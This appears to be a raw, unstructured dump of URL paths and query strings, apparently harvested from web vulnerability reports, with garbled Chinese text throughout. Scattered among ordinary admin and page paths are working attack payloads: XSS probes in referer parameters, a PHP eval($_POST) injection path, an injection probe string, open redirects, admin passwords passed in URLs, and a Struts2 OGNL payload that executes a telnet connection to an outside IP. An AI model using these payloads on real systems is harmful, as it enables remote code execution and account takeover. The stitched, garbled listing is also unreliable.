/p-b04be1700121cf2eba0dc2bdd04f9f18/59594d3462b814d850187c25a9aefaf9?sign=MBO:jNU3V4XnGngC:HCIbllvsYreVw2AwmDWQfHSh%2F%2Bg%3D&response-content-disposition=attachment;%20filename=%22DNF%E7%BB%BF%E8%89%B2%E8%BF%9E%E5%8F%91V1.5.zip%22&response-cache-control=private /mf360/admin/index.aspx /admin/Login.aspx /hr/cgi-bin/admin/login.html /newwebloan/admin/header.aspx /admin/index.php?a=login /admin/login.php /CompMan/compman/suitinput.crm?method=getProduct&fatherId= /news/view_guonei2.asp?id=1520576 /news/view_guoji2.asp?id=1520750 /news/view_keji2.asp?id=1519277 /news/view_caijing2.asp?id=1517901 /news/view_titan2.asp?id=1519512 /main/view_it.asp?id=1518741 /news/view_yule2.asp?id=1517263 /kankan/ClickOnceX/KankanClickOnceX.application /wo_pc/product.jsp?id=45299 /Default.aspx) /resume.aspx?ChannelId=14&ColumnId=95 /companyBranch.aspx?str=850 /zhuantiDetail.aspx?ID=1844 /ncenterDetail1.aspx?ID=1842 /expertNew.aspx?ColumnId=85 /serviceCustomer.aspx?ChannelId=10&ColumnId=89 /productTechnique.aspx?ChannelId=7&ColumnId=78 /rdzt/show.jsp?id=501 12320WEB /manage/download.jsp?filepath= /manage/login.jsp /jmx-console/可利用void /) /register/verify /manage/download.jsp?filepath=manage/login.jsp /manage/fujian.jsp / /crm/logon /#hl=zh-CN&newwindow=1&safe=strict&q=%E8%81%94%E7%B3%BB++%4036kr.com&oq=%E8%81%94%E7%B3%BB++%4036kr.com&aq=f&aqi=&aql=&gs_l=serp.12...0.0.7.845297.0.0.0.0.0.0.0.0..0.0.erf1..0.0.UaAQm4euGag&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=c05da0994da9ff65&biw=1252&bih=567 /od /crm/logon /sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId= //login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0 
/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid= //login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0 /sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx= //login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0 /sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid= //login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0 /sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType= /sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0 /sdohelp.ashx?gameid=200012500&area=4000&type=3&maxlen=10&maxnum=4&src= /gaea/phone_default.aspx?from=121&zone= /gaea/phone_default.aspx?from=121&zone=nav&ptType= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid= /bbs/?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287161522%29%3B%3C/script%3E&cookietime=2592000 /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002= 
/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent= 
/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype= /cas/loginStateService?method= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo= /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount= /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId= 
/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId= /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId= /login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0 /cas/login?service= /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid= /login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0 /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx= /login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0 
/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid= /login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0 /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType= /login?refer=&encryptFlag=0 /Partner/PromotionList.aspx?type= /knowledge/ClassShow/11690?queryString= /knowledge/ClassShow/11689?queryString= /knowledge/ClassShow/11690?queryString=1&idx= /knowledge/ClassShow/11688?queryString= /knowledge/ClassShow/11687?queryString= /knowledge/ClassShow/11695?queryString= /knowledge/ClassShow/11689?queryString=1&idx= /knowledge/ClassShow/11688?queryString=1&idx= /knowledge/ClassShow/11695?queryString=1&idx= /knowledge/ClassShow/11687?queryString=1&idx= /knowledge/ClassShow/11693?queryString= /knowledge/ClassShow/11693?queryString=1&idx= /knowledge/ClassShow/12569?queryString= /knowledge/ClassShow/12569?queryString=1&idx= /knowledge/ClassShow/11578?queryString= /knowledge/ClassShow/11583?queryString= /knowledge/ClassShow/11584?queryString=1&idx= /knowledge/ClassShow/11578?queryString=1&idx= /knowledge/ClassShow/11583?queryString=1&idx= /gaea/input_pt.aspx?from=121&zone= /gaea/phone_overseas.aspx?from= /gaea/phone_overseas.aspx?from=121&zone= 
/gaea/phone_overseas.aspx?from=121&zone=nav&ptType= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner= 
/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection= /bbs/index.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287151867%29%3B%3C/script%3E&cookietime=2592000 /bbs/register.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282564266%29%3B%3C/script%3E&cookietime=2592000 /bbs/memcp.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%285235041%29%3B%3C/script%3E&cookietime=2592000 /bbs/medal.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%283273439%29%3B%3C/script%3E&cookietime=2592000 
/bbs/stats.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000 /bbs/member.php?action=lostpasswd&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000 /bbs/2fly_gift.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282847615%29%3B%3C/script%3E&cookietime=2592000 /bbs/forumdisplay.php?fid=24&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282950003%29%3B%3C/script%3E&cookietime=2592000 /knowledge/ClassShow/13045?queryString= /knowledge/ClassShow/13046?queryString= /knowledge/ClassShow/13047?queryString= /knowledge/ClassShow/13048?queryString= /knowledge/ClassShow/13045?queryString=1&idx= /knowledge/ClassShow/13049?queryString= /knowledge/ClassShow/13047?queryString=1&idx= /knowledge/ClassShow/13046?queryString=1&idx= /knowledge/ClassShow/13048?queryString=1&idx= /knowledge/ClassShow/13049?queryString=1&idx= /knowledge/ClassShow/13063?queryString= /knowledge/ClassShow/13064?queryString= /knowledge/ClassShow/13068?queryString= /knowledge/ClassShow/13070?queryString= /knowledge/ClassShow/13063?queryString=1&idx= /knowledge/ClassShow/13064?queryString=1&idx= /knowledge/ClassShow/13072?queryString= /knowledge/ClassShow/13067?queryString= /knowledge/ClassShow/13071?queryString= /knowledge/ClassShow/13068?queryString=1&idx= /knowledge/ClassShow/13072?queryString=1&idx= /knowledge/ClassShow/13089?queryString= /knowledge/ClassShow/13067?queryString=1&idx= /knowledge/ClassShow/13093?queryString= /knowledge/ClassShow/13091?queryString= /knowledge/ClassShow/13071?queryString=1&idx= /knowledge/ClassShow/13092?queryString= /knowledge/ClassShow/13088?queryString= /knowledge/ClassShow/13094?queryString= /knowledge/ClassShow/13090?queryString= /knowledge/ClassShow/13089?queryString=1&idx= /knowledge/ClassShow/13091?queryString=1&idx= /knowledge/ClassShow/13093?queryString=1&idx= /knowledge/ClassShow/13095?queryString= /knowledge/ClassShow/13092?queryString=1&idx= 
/knowledge/ClassShow/13088?queryString=1&idx= /knowledge/ClassShow/13090?queryString=1&idx= /knowledge/ClassShow/13094?queryString=1&idx= /knowledge/ClassShow/13085?queryString= /knowledge/ClassShow/13087?queryString= /knowledge/ClassShow/13070?queryString=1&idx= /knowledge/ClassShow/13095?queryString=1&idx= /knowledge/ClassShow/13082?queryString= /knowledge/ClassShow/13080?queryString= /knowledge/ClassShow/13078?queryString= /knowledge/ClassShow/13083?queryString= /knowledge/ClassShow/13079?queryString= /knowledge/ClassShow/13085?queryString=1&idx= /knowledge/ClassShow/13087?queryString=1&idx= /knowledge/ClassShow/13075?queryString= /knowledge/ClassShow/13076?queryString= /knowledge/ClassShow/13082?queryString=1&idx= /knowledge/ClassShow/13080?queryString=1&idx= /knowledge/ClassShow/13078?queryString=1&idx= /knowledge/ClassShow/12545?queryString= /knowledge/ClassShow/13076?queryString=1&idx= /knowledge/ClassShow/13075?queryString=1&idx= /knowledge/ClassShow/12548?queryString= /knowledge/ClassShow/13077?queryString= /knowledge/ClassShow/12554?queryString= /knowledge/ClassShow/12545?queryString=1&idx= /knowledge/ClassShow/12549?queryString= /knowledge/ClassShow/13079?queryString=1&idx= /knowledge/ClassShow/13083?queryString=1&idx= /knowledge/ClassShow/12555?queryString= /knowledge/ClassShow/13077?queryString=1&idx= /knowledge/ClassShow/12554?queryString=1&idx= /knowledge/ClassShow/12548?queryString=1&idx= /knowledge/ClassShow/13074?queryString= /knowledge/ClassShow/12556?queryString= /knowledge/ClassShow/13052?queryString= /knowledge/ClassShow/13058?queryString= /knowledge/ClassShow/13074?queryString=1&idx= /knowledge/ClassShow/13056?queryString= /knowledge/ClassShow/13055?queryString= /knowledge/ClassShow/13052?queryString=1&idx= /knowledge/ClassShow/13057?queryString= /knowledge/ClassShow/13060?queryString= /knowledge/ClassShow/13061?queryString= /knowledge/ClassShow/13058?queryString=1&idx= /knowledge/ClassShow/13062?queryString= 
/knowledge/ClassShow/12556?queryString=1&idx= /knowledge/ClassShow/12555?queryString=1&idx= /knowledge/ClassShow/13056?queryString=1&idx= /edit/index/27699001?referenceName[]= /knowledge/ClassShow/13055?queryString=1&idx= /knowledge/ClassShow/13061?queryString=1&idx= /knowledge/ClassShow/13057?queryString=1&idx= /knowledge/ClassShow/13060?queryString=1&idx= /knowledge/ClassShow/12549?queryString=1&idx= /knowledge/ClassShow/13059?queryString= /edit/index/27699001?referenceName[]=&referenceUrl[]= /knowledge/ClassShow/13062?queryString=1&idx= /edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle= /knowledge/ClassShow/13059?queryString=1&idx= /edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID= /knowledge/ClassShow/11997?queryString= /knowledge/ClassShow/11997?queryString=1&idx= /edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType= /knowledge/ClassShow/12000?queryString= /knowledge/ClassShow/12000?queryString=1&idx= /edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference= /edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia= /admin/ /admin/ /200909/admin/ /wp-login.php /index.php /manage/ /search.aspx?categoryid=%27%22%27%22%29%3b%7c%5d*%7b%250d%250a%3C%2500%3E&categoryname=%E8%89%BA%E6%9C%AF&page=4&searchtype=ebook /sdodownload/passport/SNDAHomepage/SNDANavigator.aspx?From=1000Y.SDO.COM&Panel=HOME_NEWSBAR&To=http://www.wooyun.org /ssologin.aspx?a=a&CasBackUrl=http://wooyun.org www.tiwte.ac.cn www.tjhcz.com.cn) /tpxw/201205/t20120510_2293603.htm /2304731083/ykoBnDgJM?type=repost 
/c?m=9d78d513d9801bf94fece4690d61c0676901dd272bd6a0027fa38449e33507550026bdb47d645646c4c40f7a1cec130afdf041276a4737b7ec99d457&p=85769a448e8011a05debca314d0d&user=baidu&fm=sc&query=qhd%2Egov%2Ecn&qid=c7365c2b38e34fb4&p1=1 /testqwe456iuut.jsp /getMailByUserName_iiut.jsp /registeruserhandly.jsp?pass=059258 /getUserByUserName_iiut.jsp /getUserDetail_iuwkk.jsp?password=uid54pok009&usernames=admin /get.jsp?username=admin&password=hxp943761 /commons/paylog.do /index.php?controller=default&action=works&orderby=abs /pvzsocial/?origin= /chuanzhang/?origin= /paopaoyu/?origin= /dandanlong/?origin= /qjiangsanguo/?origin= /littlewar?origin= /boyaa_texas/?origin= /rongcar/?origin= /smsanguo/?origin= /paopaoyu/?origin= /qjiangsanguo/?origin= /myprincess/?origin= /manorage/?origin= /hongsejingjie?origin= /weisanguo?origin= /friendetective?origin= /bj/golden/community-2012?pi= /movie/index.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%2059.39.101.13%2012345%20%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /admin/ /whzfhf/index.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%2059.39.101.13%2012345%20%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 
/index.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%2059.39.101.13%2012345%20%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 //127.0.0.1/moc.udiab.www www.baidu.com/1.0.0.721//:ptth那么在某些大公会或者万人群发送则如下图: /pwd/xxxxxx%3Cscript%3Ealert(%22XSS%22)%3C/script%3E /index.php/article/view/aid/$%7B@eval%28$_POST%5Bf%5D%29%7D /THinkphp/oday.php /ajax/2011.php /admin/ /it/detail_2012_05/27/14839402_0.shtml /jsp/admin/ewebeditor/admin/login.jsp /set/submit/theme /set/submit/theme /pub/submit/modifytext /m.js' /news/newslistleader?leader=1 /center/pages/download.jsp?path=uploads%5C2011%5C11%5C28%5C1133252150510.doc&name=%C5%E7%CB%AE%C3%F0%BB%F0%B2%FA%C6%B7.doc /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011080757367455&outBizNo=2011080701976855&settleStatus=S&bizIdentity=trade30001&orderId=7f2c492f1d4dbd5b9399287470ae9c16&signData=817a3ed0e6fcea78a91046b204689827 /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011113031140082&outBizNo=2011113068080882&settleStatus=S&bizIdentity=trade30001&orderId=79fcecb20058c85cecdaae6c7a714802&signData=849f245f8eb4af5744bf6c828a69cdea /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011112090032338&outBizNo=2011112017277138&settleStatus=S&bizIdentity=trade30001&orderId=1055787abc3a58a92c2b46ce4a717ea3&signData=f9b313cb90033b89aeac126a92e22eaa /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011082552069093&outBizNo=2011082511373193&settleStatus=S&bizIdentity=trade30001&orderId=7adcacac85911e25163023b46a4ed737&signData=623dad933f6bf6b1041f70f73eaedc3b 
/standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011101324041849&settleStatus=S&errorMsg=&signData=37061723d1268067aa68c294b7baae6a&merVAR=¬ifyData=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IkdCSyIgc3 /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011121292986160&settleStatus=S&errorMsg=&signData=d135f6731821523eec72f34cef143572&merVAR=¬ifyData=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IkdCSyIgc3 /standard/result/paymentResult.htm?settleStatus=S&isSettleSuccess=true&depositId=2011031974521180&outBizNo=2011031997740292&bizIdentity=trade30001&orderId=524be3b0711a12b3c9f76c709d839ba3&signData=37e41e2ff3037eca31a01e6f22df5203 /standard/result/paymentResult.htm?settleStatus=S&isSettleSuccess=true&depositId=2012052122395041&outBizNo=2012052159566141&bizIdentity=trade30001&orderId=0521cd2cb9db166d38833c0100571418&signData=2d7d60babacbcb514815fd998bed95ee /standard/result/paymentResult.htm?settleStatus=S&isSettleSuccess=true&depositId=2012052122395041&outBizNo=2012052159566141&bizIdentity=trade30001&orderId=0521cd2cb9db166d38833c0100571418&signData=2d7d60babacbcb514815fd998bed95ee /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2012022599555295&outBizNo=2012022472986595&settleStatus=S&bizIdentity=trade30001&orderId=f8b38c82599b7933c586160029503063&signData=038f19b006a24fa889b4aaa693a2bc76 /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2012010963115297&outBizNo=2012010922053897&settleStatus=S&bizIdentity=trade30001&orderId=d0b4a40c48ee8e6571017de0bfa3063b&signData=c51ec7c214d5b670f9cc25c2aea8b140 